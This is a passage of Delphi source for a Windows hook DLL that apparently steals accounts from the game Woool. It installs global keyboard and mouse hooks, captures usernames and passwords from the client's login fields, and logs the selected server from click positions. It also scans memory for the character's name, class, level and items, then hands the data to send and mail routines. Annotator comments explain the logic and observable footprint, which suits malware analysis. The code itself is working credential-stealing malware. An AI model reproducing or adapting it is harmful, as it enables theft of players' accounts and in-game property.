📄 unithookdll.pas
begin
VirtualQueryEx(ProcessHndle, PMemoAddr, MBI, SizeOf(MBI));
if (dword(MbI.BaseAddress) = OldBasse) and (MbI.RegionSize <= 0) then break;
//writedat2('g2:' + inttostr(integer(MbI.BaseAddress))+' '+inttostr(MbI.RegionSize)+' '+inttostr(Mbi.Protect));
OldBasse := dword(MbI.BaseAddress);
PMemoAddr := pointer(dword(MbI.BaseAddress) + MbI.RegionSize + $F);
//setlength(sTmp, MbI.RegionSize);
//ReadProcessMemory(ProcessHndle, PMemoAddr, pchar(sTmp), MbI.RegionSize, lpNumberOfBytesRead);
//if(MBI.State = MEM_COMMIT)then //MEM_COMMIT=$1000 MEM_RESERVE=$2000 MEM_FREE=$10000
if (Mbi.Protect = PAGE_READONLY) or (Mbi.Protect = PAGE_READWRITE) or (Mbi.Protect = PAGE_WRITECOPY) then
begin
try
p := MbI.BaseAddress;
if MbI.RegionSize > $10 then
begin
size := MbI.RegionSize - $10;
while true do
begin
d1 := StrPosD(p, size, $CDCD0000);
if d1 = $FFFFFFFF then
begin
break;
end;
dec(size, d1 + 4);
inc(p, d1 + 4);
//writedat2('found1 ' + inttostr(integer(P)) + ' ' + inttostr(size) + ' ' + inttostr(plongword(p - 4)^));
if (plongword(p - $C)^ = 0) and (plongword(p - $8)^ = $0F) and
(plongword(p)^ = 0) and (plongword(p + $4)^ = 0) then
begin
writedat2('found2 ' + inttostr(integer(P)));
inc(p, $10);
dec(size, $10);
if plongword(p)^ <> $CDCDCDCD then
begin
writedat2('found3 ' + inttostr(integer(P)));
s := '';
for i1 := 0 to $30 - 1 do
begin
if (p[0] <> #0) then
begin
strlcopy(@buf, p, 30);
//writedat2(buf);
s := s + buf + #$D#$A;
end;
inc(p, $60);
end;
if s <> '' then
begin
strcopy(@wupin, pchar(s));
writedat2('物品:' + wupin);
if timer1 <> 0 then killtimer(0, timer1);
timer1 := 0;
send;
end;
bBreak := true;
break;
end;
end;
end;
end;
except
end;
end;
end;
except
end;
end;
CloseHandle(ProcessHndle);
result := 0;
end;
// Timer callback (armed in LogoMouse with a 4000 ms interval and stored in TimerFindWupin).
// Cancels its own timer and starts GetWinPin on a separate thread. GetWinPin is
// defined outside this excerpt; the "Wupin" naming and the log strings elsewhere in the unit
// suggest it is the item-list memory scan - confirm against its definition.
// The Wnd/uMsg/idEvent/Time parameters of the TimerProc signature are not used.
procedure FunTimerFindWupin(Wnd: Longint; uMsg: UINT; idEvent: UINT; Time: DWORD); stdcall;
var
ThreadId1: dword;
begin
// Kill the timer first so the callback fires once per arming.
killtimer(0, TimerFindWupin);
// NOTE(review): the handle returned by CreateThread is discarded and therefore never closed;
// a failed thread creation is also not detected.
CreateThread(nil, 0, @GetWinPin, nil, 0, ThreadId1);
end;
{ Rescales a point given in real screen pixels to a nominal 1024x768 coordinate space.
  pt     - point in current screen coordinates.
  Result - the same position expressed on a 1024x768 grid, each axis rounded independently.
  The caller (LogoMouse) compares the result against hard-coded rectangles, so this is what
  makes those rectangles resolution-independent. }
function Get1024pt(pt: TPoint): TPoint;
const
  NominalWidth = 1024;
  NominalHeight = 768;
var
  ScreenW, ScreenH: integer;
begin
  // Primary display size in pixels.
  ScreenH := GetSystemMetrics(SM_CYSCREEN);
  ScreenW := GetSystemMetrics(SM_CXSCREEN);
  // Divide first, then scale, then round - same evaluation order on both axes.
  result.Y := round(pt.Y / ScreenH * NominalHeight);
  result.X := round(pt.X / ScreenW * NominalWidth);
end;
// Walks the readable memory of the CURRENT process (the DLL runs inside the hooked client)
// looking for a '/'-delimited character record of the form shown in the sample comment below
// (name/job/?/level/sex), and stores a readable summary in the global Role buffer.
//
// Returns: as written, always '' - result is assigned only on entry. The text that is found
// goes to the global Role, so the "if s <> ''" branch in the caller (LogoMouse) cannot be taken.
// Side effects visible here: sets and clears GetRoleInfoBusy, writes Role, cancels and re-arms
// timer1 (10000 ms, callback timerfun), and logs progress through writedat2.
//
// Analyst notes:
// - the behaviour to look for is a module that opens its own process with VM_READ and walks the
//   whole user address range with VirtualQueryEx, pattern-matching on every readable region;
// - the progress strings 'Role g1', 'found0'..'found4' are passed to writedat2 (sink not visible here);
// - all pointer arithmetic goes through dword casts;
// - every fault raised while reading memory is swallowed by the empty except blocks.
function GetRoleFromMem: string;
var
ProcessHndle: HWND;
SysInfo: _SYSTEM_INFO;
MBI: MEMORY_BASIC_INFORMATION;
PMemoAddr: Pointer;
//MemoAddr, lpNumberOfBytesRead
OldBasse: DWORD;
ibak, i1, i2: integer;
d1, size: longword;
p, pbak: pchar;
bfound, bBreak: boolean;
s, info: string;
// Maps the job digit of the record to a display string (literal strings are the game's class names);
// any other character yields ''.
function GetJob(c: char): string;
begin
case c of
'0': result := ' 武士';
'1': result := ' 魔法师';
'2': result := ' 道士';
else result := '';
end;
end;
// Maps the sex digit of the record to a display string; any other character yields ''.
function GetSex(c: char): string;
begin
case c of
'0': result := ' 男';
'1': result := ' 女';
else result := '';
end;
end;
// Returns a space followed by c[0], plus c[1] when c[1] is a decimal digit
// (i.e. a one- or two-character level field). c[0] itself is not validated.
function GetGrade(c: pchar): string;
begin
result := ' ' + c[0];
if (c[1] >= '0') and (c[1] <= '9') then result := result + c[1];
end;
// Copies characters from c up to (not including) the first '/', reading at most 31 bytes (0..30).
// A #0 inside that window does not stop the copy.
function GetName(c: pchar): string;
var
i: integer;
begin
result := '';
for i := 0 to 30 do
if c[i] = '/' then break
else result := result + c[i];
end;
// Looks for the next '/' in c[iStart .. iStart + iMaxStep - 1].
// Returns true and sets iIndex to its position when found; otherwise returns false and
// leaves iIndex untouched.
// NOTE(review): characters that are neither a digit nor '/' fall through both branches and are
// skipped as well, so the scanned run is not actually required to be numeric.
function GetSeqWhileNum(c: pchar; iStart, iMaxStep: integer; var iIndex: integer): boolean;
var
i1: integer;
begin
result := false;
for i1 := iStart to iStart + iMaxStep - 1 do
begin
if (c[i1] >= '0') and (c[i1] <= '9') then //nothing
else if c[i1] = '/' then
begin
result := true;
iIndex := i1;
break;
end;
end;
end;
begin
result := '';
// Simple busy flag: a second call while a scan is running returns immediately.
if GetRoleInfoBusy then exit;
GetRoleInfoBusy := true;
bBreak := false;
// Handle to the process this code is running in, with rights to query and read its memory.
ProcessHndle := OpenProcess(PROCESS_VM_OPERATION or PROCESS_VM_READ or PROCESS_QUERY_INFORMATION, false, GetCurrentProcessId);
if ProcessHndle > 0 then
begin
writedat2('Role g1');
GetSystemInfo(SysInfo);
OldBasse := $FFFFFFFF;
// Start at the lowest user-mode address and step region by region up to the highest.
PMemoAddr := SysInfo.lpMinimumApplicationAddress;
try
while (not bBreak) and (dword(PMemoAddr) < dword(SysInfo.lpMaximumApplicationAddress)) do
begin
// NOTE(review): the return value of VirtualQueryEx is not checked; on failure MBI keeps
// whatever the previous iteration left in it.
VirtualQueryEx(ProcessHndle, PMemoAddr, MBI, SizeOf(MBI));
// Stop if the walk did not advance (same base as last time and an empty region).
if (dword(MbI.BaseAddress) = OldBasse) and (MbI.RegionSize <= 0) then break;
//writedat2('g2:' + inttostr(integer(MbI.BaseAddress))+' '+inttostr(MbI.RegionSize)+' '+inttostr(Mbi.Protect));
OldBasse := dword(MbI.BaseAddress);
// Next query address: end of this region plus $F.
PMemoAddr := pointer(dword(MbI.BaseAddress) + MbI.RegionSize + $F);
// Only regions whose protection is exactly read-only, read-write or write-copy are scanned;
// MBI.State is not consulted.
if (Mbi.Protect = PAGE_READONLY) or (Mbi.Protect = PAGE_READWRITE) or (Mbi.Protect = PAGE_WRITECOPY) then
begin
try
p := MbI.BaseAddress;
if MbI.RegionSize > 10 then
begin
// 10-byte safety margin at the end of the region. The look-ahead below (p[i2 + 1], GetName)
// and the backward walk through pbak can reach outside that margin; faults are absorbed
// by the enclosing try/except.
size := MbI.RegionSize - 10;
while (not bBreak) do
begin
// StrPosChar is defined outside this excerpt; from its use here it presumably returns the
// offset of the next '/' within size bytes, or $FFFFFFFF when there is none - confirm.
d1 := StrPosChar(p, size, '/');
if d1 = $FFFFFFFF then
begin
break;
end;
dec(size, d1 + 1);
// p now points at the '/' that ends the candidate name field.
inc(p, d1);
// wenson/2/17/0/0/*sdfsdf23/0/209/41/0/
// name/job/?/level/sex
if (p[2] = '/') and
(p[1] >= '0') and (p[1] <= '2') and //job
(p[3] >= '0') and (p[3] <= '9') then //unknown field
begin
writedat2('found0 ' + strpas(p));
// i1 = position of the '/' closing the unknown field (searched in p[4..8]).
if GetSeqWhileNum(p, 4, 5, i1) then
begin
writedat2('found1 ' + inttostr(i1));
// i2 = position of the '/' closing the level field (searched in the 3 bytes after i1).
if GetSeqWhileNum(p, i1 + 1, 3, i2) then
begin
writedat2('found2 ' + inttostr(i2));
if (p[i2 + 1] >= '0') and (p[i2 + 1] <= '1') then //Sex
begin
info := GetJob(p[1]) + GetSex(p[i2 + 1]) + GetGrade(@p[i1 + 1]);
writedat2('found3 ' + info);
// Walk backwards (at most 21 bytes) from the byte before the '/' to find where the name starts.
pbak := p - 1;
for ibak := 0 to 20 do
begin
if (pbak[0] = '*') or (pbak[0] = '/') then bFound := true //stop
else if (pbak[0] >= '0') and (pbak[0] <= 'z') then bFound := false
else if (pbak[0] >= #$A1) and (pbak[0] <= #$FE) then //byte 1 of a double-byte Chinese character
begin
dec(pbak);
// NOTE(review): both operands test the same byte, so the second comparison is redundant;
// presumably two different bytes were meant to be compared against #$CC - confirm intent.
if (pbak[0] = #$CC) and (pbak[0] = #$CC) then
begin
inc(pbak);
bFound := true; //stop
end
else if (pbak[0] >= #$A1) and (pbak[0] <= #$F7) then //byte 0 of a double-byte Chinese character
bFound := false
else begin
inc(pbak);
bFound := true; //stop
end;
end
else bFound := true; //stop
if bFound then
begin
if (pbak[0] = '*') then dec(pbak);
// First record is labelled 'A-'.
info := 'A-' + GetName(@pbak[1]) + info;
writedat2('found4 ' + info);
// Skip past the sex field to whatever follows the first record.
inc(p, i2 + 3);
// NOTE(review): strcopy into the global Role is unbounded; the size of Role is declared
// outside this excerpt, so whether info always fits cannot be confirmed from here.
if (p[0] <> '*') and
((p[0] < '0') or (p[0] > 'z') or (p[0] = '/')) then
strcopy(@Role, pchar(info))
else begin
// A second record appears to follow; parse it the same way and label it 'B-'.
s := GetName(p);
inc(p, length(s));
if GetSeqWhileNum(p, 4, 5, i1) and
GetSeqWhileNum(p, i1 + 1, 3, i2) and
(p[i2 + 1] >= '0') and (p[i2 + 1] <= '1') then //Sex
begin
info := info + ' B-' + s + GetJob(p[1]) + GetSex(p[i2 + 1]) + GetGrade(@p[i1 + 1]);
strcopy(@Role, pchar(info))
end
else strcopy(@Role, pchar(info));
end;
// Restart the 10-second timer1; timerfun is defined outside this excerpt.
if timer1 <> 0 then killtimer(0, timer1);
timer1 := settimer(0, 1, 10000, @timerfun);
writedat2('角色:' + Role);
// First match wins: leave the backward walk and, via bBreak, both scan loops.
bBreak := true;
break;
end;
dec(pbak);
end;
end;
end;
end;
end;
inc(p);
end;
end;
except
// Any exception while reading this region is discarded and the walk moves on.
end;
end;
end;
except
// Any exception in the region walk itself is discarded.
end;
end;
// Runs even when OpenProcess failed (ProcessHndle = 0).
CloseHandle(ProcessHndle);
GetRoleInfoBusy := false;
end;
// Mouse-click handler called from MouseProc for button-down / double-click events.
// wpa - the mouse message identifier (not used in the body).
// lpa - the hook's lParam, treated as a pointer to MOUSEHOOKSTRUCT.
//
// Does nothing unless isCQ is set (the host executable name matched in the unit's initialization).
// Two modes:
//   isUpdate - in the 'woool.exe' process: reads the text of the TComboBox on the launcher form and
//              stores it in the shared-memory field qu, then returns.
//   otherwise - in the game window (title prefix sText, class sClass): maps the click to a 1024x768
//              grid and drives a small state machine in the global imain by hit-testing hard-coded
//              rectangles. What each rectangle is on screen is not visible in this file; the actions
//              attached to them are GetUP, recording a server index, do1, GetRoleFromMem and arming
//              the TimerFindWupin timer.
// Analyst note: every click is logged through writedat2 with window title, class and coordinates.
procedure LogoMouse(wpa, lpa: integer);
var
p, h: hwnd;
pt: TPoint;
rect: Trect;
WinText, ClassText: array[0..255] of char;
s: string;
begin
if not isCQ then exit;
// Window that received the click.
p := pMOUSEHOOKSTRUCT(lpa)^.hwnd; //GetForegroundWindow;
WinText[0] := #0;
GetWindowText(p, @WinText, sizeof(WinText));
ClassText[0] := #0;
GetClassName(p, @ClassText, sizeof(ClassText));
if isUpdate then
begin
writedat2('mouse WinText:' + WinText + ' class:' + classtext);
// Launcher main form, identified by class name and exact window title.
if (ClassText = 'TForm1') and (wintext = '传奇世界客户端') then
begin
h := findwindowex(p, 0, 'TComboBox', nil);
writedat2('mouse WinText:' + WinText + ' class:' + classtext + ' :' + inttostr(h));
if h <> 0 then
begin
WinText[0] := #0;
GetWindowText(h, WinText, sizeof(WinText));
// The combo box text is published to all processes through the shared mapping.
// NOTE(review): unbounded strcopy; the size of pshmem^.qu is declared outside this excerpt.
strcopy(@pshmem^.qu, pchar(trim(wintext)));
writedat2('区mouse: ' + pshmem^.qu);
end;
end;
exit;
end;
writedat2(' mouse WinText:' + WinText + ' class:' + classtext + ' x:' + inttostr(pMOUSEHOOKSTRUCT(lpa)^.pt.X) +
' Y:' + inttostr(pMOUSEHOOKSTRUCT(lpa)^.pt.Y));
// Only clicks on the target window are interpreted: first 8 characters of the title and the
// class name must match the globals sText / sClass (defined outside this excerpt).
if (copy(wintext, 1, 8) = sText) and (classtext = sClass) then
begin
pt := Get1024pt(pMOUSEHOOKSTRUCT(lpa)^.pt);
writedat2('x:' + inttostr(pt.x) + ' y:' + inttostr(pt.y));
// Rectangle 1: a hit calls GetUP(nil) and moves the state to 1.
// GetUP is defined outside this excerpt - presumably it collects the user/pass globals; confirm.
rect.Left := 151;
rect.Top := 553;
rect.Right := 199;
rect.Bottom := 572;
if ptinrect(rect, pt) then
begin
GetUP(nil);
imain := 1;
end;
if (imain = 1) or (imain = 2) then
begin
// Rectangle 2: a vertical list with a 33-pixel row pitch; only the first 24 pixels of each
// row count as a hit. The 1-based row number is stored as text in the global server.
rect.Left := 460;
rect.Top := 307;
rect.Right := 608;
rect.Bottom := 561;
if ptinrect(rect, pt) and ((pt.Y - rect.Top) mod 33 <= 23) then
begin
strcopy(@server, pchar(inttostr(1 + (pt.Y - rect.Top) div 33)));
imain:=2;
writedat2('server:' + server);
// If either credential buffer is still empty and pUp1 is set, fall back to do1(nil)
// (defined outside this excerpt) and stop handling this click.
if (pUp1 <> nil) and ((user[0] = #0) or (pass[0] = #0)) then
begin
do1(nil);
exit;
end;
end;
end;
if imain = 2 then
begin
// Rectangle 3: hit while no role has been captured yet -> state 3, scan memory for the
// character record, then arm the 4-second TimerFindWupin timer.
rect.Left := 443;
rect.Top := 731;
rect.Right := 545;
rect.Bottom := 757;
if ptinrect(rect, pt) and (role[0] = #0) then
begin
imain:=3;
writedat('开始找角色');
s := GetRoleFromMem;
// GetRoleFromMem writes the global role itself and, as written, returns ''.
if (s <> '') then
begin
strcopy(@role, pchar(s));
writedat('找到角色:' + role);
end;
writedat2('Role:' + role);
TimerFindWupin := settimer(0, 2, 4000, @FunTimerFindWupin);
end;
end;
end;
end;
// Key-down handler called from KeyPro.
// wpa - virtual-key code of the key; lpa - the hook's lParam (not used in the body).
//
// Does nothing unless isCQ is set. Every key-down is logged ('key0:' + code). When the active
// window matches the target (title prefix sText, class sClass), the handler calls GetEditCount on
// it and, when the key is Enter, calls GetUP(nil) and sets the state variable imain to 1.
// GetEditCount and GetUP are defined outside this excerpt; from the names they presumably
// enumerate the window's Button/Edit children and read the credential fields - confirm.
// Analyst note: the log line below writes the contents of the user and pass globals in clear text
// on every key-down in the target window; the sink behind writedat2 is not visible here.
procedure LogoKey(wpa, lpa: integer);
var
p: hwnd;
WinText, ClassText: array[0..255] of char;
begin
if not isCQ then exit;
writedat2('key0:' + inttostr(Wpa));
// Active window of the calling thread, not necessarily the window the key was aimed at.
p := GetActiveWindow;
WinText[0] := #0;
GetWindowText(p, WinText, sizeof(WinText));
ClassText[0] := #0;
GetClassName(p, ClassText, sizeof(ClassText));
if (copy(wintext, 1, 8) = sText) and (classtext = sClass) then
begin
GetEditCount(p, 'Button', 'Edit');
// ic1..ic4, user and pass are globals defined outside this excerpt.
writedat2('iC: ' + inttostr(ic1) + ' ' + inttostr(ic2) + ' ' + inttostr(ic3) + ' ' + inttostr(ic4) + ' user:' + user + ' pass:' + pass);
if (Wpa = vk_return) then
begin
GetUP(nil);
imain := 1;
end;
end;
end;
// WH_KEYBOARD hook procedure (installed by StartHook, hook handle kept in shared memory).
// Forwards the event to the next hook in the chain first and returns that result; then, for
// key-down events only, passes wParam (virtual-key code) and lParam to LogoKey.
// NOTE(review): iCode is never examined. The hook contract expects a procedure to forward the
// event without processing it when the code is negative.
function KeyPro(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT;
stdcall; export;
begin
Result := CallNextHookEx(pshmem^.KeyHook, iCode, wParam, lParam);
// Bit 31 of lParam is the transition state: 0 = key is being pressed, 1 = released.
if ((Lparam and $80000000) = 0) then
begin
LogoKey(wparam, lparam);
end;
end;
// WH_MOUSE hook procedure (installed by StartHook, hook handle kept in shared memory).
// For left-button-down, right-button-down and left double-click messages it calls LogoMouse with
// the message id and lParam (which LogoMouse treats as a MOUSEHOOKSTRUCT pointer), then forwards
// the event to the next hook and returns that result.
// NOTE(review): iCode is never examined. The hook contract expects a procedure to forward the
// event without processing it when the code is negative.
function MouseProc(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT;
stdcall; export;
begin
if (wparam = WM_LBUTTONDOWN) or (wparam = WM_RBUTTONDOWN) or (wparam = WM_LBUTTONDBLCLK) then
begin
LogoMouse(wparam, lparam);
end;
Result := CallNextHookEx(pshmem^.MouseHook, iCode, wParam, lParam);
end;
// Exported entry point that arms the DLL: stores its arguments in the shared-memory block, starts
// a 1-second timer (FunTimerWriteDat, defined outside this excerpt) and installs keyboard and
// mouse hooks if they are not already installed.
// data, BackDoor - C strings copied verbatim into pshmem^.data / pshmem^.backdoor; how they are
//                  used is not visible in this excerpt.
// VerTest        - flag stored in pshmem^.VerTest.
//
// Analyst notes:
// - SetWindowsHookEx is called with this module's HInstance and thread id 0, i.e. the hooks are
//   not tied to one thread; Windows maps the DLL into other processes on the desktop as they
//   receive keyboard/mouse events. A DLL of this kind showing up in many unrelated GUI processes,
//   together with the named file mapping created in the initialization section, is the
//   observable footprint.
// - the commented-out block is a disabled date check that would have made the call a no-op when
//   (wYear >= 2004) and (wMonth >= 9).
// NOTE(review): both strcopy calls are unbounded; the field sizes of TShareMem are declared
// outside this excerpt.
procedure StartHook(data: pchar; BackDoor: pchar; VerTest: boolean); stdcall;
//var
// SystemTime: TSystemTime;
begin
// GetLocalTime(SystemTime);
// with SystemTime do
// if (wYear >= 2004) and (wMonth >= 9) then exit;
// Marks this process as the one that installed the hooks; finalization uses it to decide
// whether to call StopHook.
FirstProcess := true;
pshmem^.qu[0] := #0;
pshmem^.VerTest := VerTest;
strcopy(pshmem^.data, data);
strcopy(pshmem^.backdoor, backdoor);
TimerWriteDat := settimer(0, 10, 1000, @FunTimerWriteDat);
// The hook handles live in shared memory, so a second StartHook call from any process that
// maps the same block does not install the hooks twice.
if pshmem^.KeyHook = 0 then
pshmem^.KeyHook := SetWindowsHookEx(WH_KEYBOARD, Keypro, HInstance, 0);
if pshmem^.MouseHook = 0 then
pshmem^.MouseHook := SetWindowsHookEx(WH_MOUSE, MouseProc, Hinstance, 0);
// if callhook = 0 then
// callhook := SetWindowsHookEx(WH_CALLWNDPROC, callProc, Hinstance, 0);
end;
{ Exported counterpart of StartHook: cancels the TimerWriteDat timer and removes the keyboard
  and mouse hooks whose handles are kept in the shared-memory block. Both handle slots are
  reset to 0 whether or not a hook was installed, so a later StartHook installs them again. }
procedure StopHook; stdcall;
begin
  killtimer(0, TimerWriteDat);
  with pshmem^ do
  begin
    // Keyboard hook: unhook only if a handle is recorded, then clear the slot.
    if KeyHook <> 0 then
      UnhookwindowsHookEx(KeyHook);
    KeyHook := 0;
    // Mouse hook: same treatment.
    if MouseHook <> 0 then
      UnhookwindowsHookEx(MouseHook);
    MouseHook := 0;
  end;
end;
// Unit start-up and shut-down. The initialization part runs in every process the DLL is loaded
// into, which for a hook DLL means every process the hooks get mapped into.
initialization
// Reset the per-process capture state (state machine, timer id, captured strings).
imain := 0;
timer1 := 0;
qu[0] := #0;
server[0] := #0;
user[0] := #0;
pass[0] := #0;
WuPin[0] := #0;
lastuser := '';
lastpass := '';
role[0] := #0;
FirstProcess := false;
SendHtmlMailData := '';
// is9x := IsWindows9x;
// Named section backed by the paging file ($FFFFFFFF in place of a file handle), sized for
// TShareMem. Every process that loads this unit opens the same object by MappingFileName, which
// is how hook handles and captured values are shared across processes.
// NOTE(review): neither hMappingFile nor pShMem is checked; a failed mapping leaves pShMem nil
// and every later pshmem^ access would fault.
hMappingFile := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(TShareMem), pchar(MappingFileName));
pShMem := MapViewOfFile(hMappingFile, FILE_MAP_WRITE or FILE_MAP_READ, 0, 0, 0);
// GetModalName is defined outside this excerpt; presumably it returns the host process's module
// path with the given extension handling - confirm. Only the file name part is kept.
filename := extractfilename(GetModalName(GetCurrentProcessId, '.dat'));
// Target selection: the handlers stay inert (isCQ = false) in every process whose file name is
// neither 'woool.exe' nor 'woool.dat' (case-insensitive). isUpdate marks the 'woool.exe' case.
isUpdate := (ansicomparetext(filename, 'woool.exe') = 0);
isCQ := isUpdate or (ansicomparetext(filename, 'woool.dat') = 0);
finalization
try
// Only the process that called StartHook removes the hooks and the timer.
if FirstProcess then
StopHook;
UnMapViewOfFile(pShMem);
CloseHandle(hMappingFile);
except
// Any exception during unload is discarded.
end;
end.